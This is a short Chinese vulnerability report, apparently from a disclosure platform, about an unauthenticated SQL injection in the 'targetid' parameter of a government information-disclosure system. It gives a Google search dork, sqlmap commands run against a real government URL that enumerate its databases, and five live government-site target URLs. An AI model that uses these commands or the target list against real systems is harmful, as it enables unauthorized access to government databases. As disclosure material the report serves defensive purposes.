### 简要描述:
某政府大量使用信息公开系统SQL注射
### 详细说明:
该系统被大量使用,Google关键字: inurl:/xxgk/jcms_files
[<img src="https://images.seebug.org/upload/201503/04225155c57cb3c3ee17ff49a418c1f5b6959ab7.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/04225155c57cb3c3ee17ff49a418c1f5b6959ab7.jpg)
/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1
无需登录,targetid存在注入
### 漏洞证明:
```
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Users\Administrator>sqlmap.py -u "http://xxgk.qingzhou.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1"
```
[<img src="https://images.seebug.org/upload/201503/042257469253dd43afaf2bcf4faf4da945ae9f87.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/042257469253dd43afaf2bcf4faf4da945ae9f87.jpg)
```
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Users\Administrator>sqlmap.py -u "http://xxgk.qingzhou.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1" --dbs
```
[<img src="https://images.seebug.org/upload/201503/042258347fb3b987d146ca87e2abbfb9d3f63e58.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/042258347fb3b987d146ca87e2abbfb9d3f63e58.jpg)
案例非常多,随便选取Google搜索结果的第一页的头5个:
```
http://xxgk.qingzhou.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1
http://xxgk.taixing.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1
http://www.xxgk.lg.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1
http://zfxxgk.zj.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1
http://www.jinhua.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1
```
京公网安备 11010502034610号
暂无评论